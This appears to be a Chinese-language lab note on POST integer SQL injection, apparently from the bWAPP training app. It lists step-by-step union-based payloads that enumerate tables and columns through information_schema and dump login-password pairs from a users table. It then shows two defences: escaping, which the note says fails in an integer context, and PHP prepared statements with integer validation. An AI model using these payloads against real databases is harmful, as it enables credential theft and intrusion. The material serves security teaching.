POST整型注入
判断是否存在注入
1+and+1=1#
1+and+1=2#
判断注入字段个数
1+order+by+7#
1+order+by+8#
判断注入字段位置
0+union+select+1,2,3,4,5,6,7#
获取数据库信息
0+union+select+1,database(),version(),user(),5,6,7#
获取表名
0+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3,4,5,6,7#
获取列名
0+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='users'+and+table_schema=database()),3,4,5,6,7#
获取信息
0+union+select+1,(select+group_concat(login,'-',password,'-')+from+users),3,4,5,6,7#
演练
low
0+union+select+1,(select+group_concat(login,'-',password,'-')+from+users),3,4,5,6,7#
mid
使用mysql_real_escape_string
// Mid-level defence from the exercise: escape the raw POST value before it is
// used in the query. mysql_real_escape_string() belongs to the legacy mysql
// extension, which was removed in PHP 7; the high-level version further down
// uses mysqli prepared statements instead.
function sqli_check_2($data)
{
// Escaping only rewrites quote, backslash, NUL and a few control characters.
// A numeric payload such as `1 and 1=1` contains none of those, so when the
// value lands in an unquoted integer context it passes through unchanged —
// an integer id should be validated as an integer, not escaped.
return mysql_real_escape_string($data);
}
high
使用预处理语句防止注入
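// High-level defence: the movie id is bound as a parameter, so the value is
// never spliced into the SQL text and the union/order-by payloads listed
// above arrive at the server as data, not as query syntax.
//
// Read the value without triggering an undefined-index notice when the
// field is absent; a missing value is rejected by the validation below.
$raw = $_POST["movie"] ?? null;
// The id column is numeric, so enforce that at the input boundary instead of
// handing arbitrary text to the driver. FILTER_VALIDATE_INT returns false for
// anything that is not a plain integer string.
$id = filter_var($raw, FILTER_VALIDATE_INT);
if ($id === false) {
    throw new InvalidArgumentException('movie id must be an integer');
}
$sql = "SELECT title, release_year, genre, main_character, imdb FROM movies WHERE id =?";
// prepare() returns false on failure (bad SQL, lost connection); report it
// instead of silently running no query. The procedural mysqli_stmt_* API is
// an equivalent alternative to the object-style calls used here.
$stmt = $link->prepare($sql);
if ($stmt === false) {
    throw new RuntimeException('prepare failed: ' . $link->error);
}
// "i" binds the value as an integer, matching the validated type above.
$stmt->bind_param("i", $id);
// Executes the query
$stmt->execute();
// Binds the result variables
$stmt->bind_result($title, $release_year, $genre, $main_character, $imdb);
// Stores the result, necessary to count the number of rows ($stmt->num_rows);
// the statement is left open so the caller can fetch from it afterwards.
$stmt->store_result();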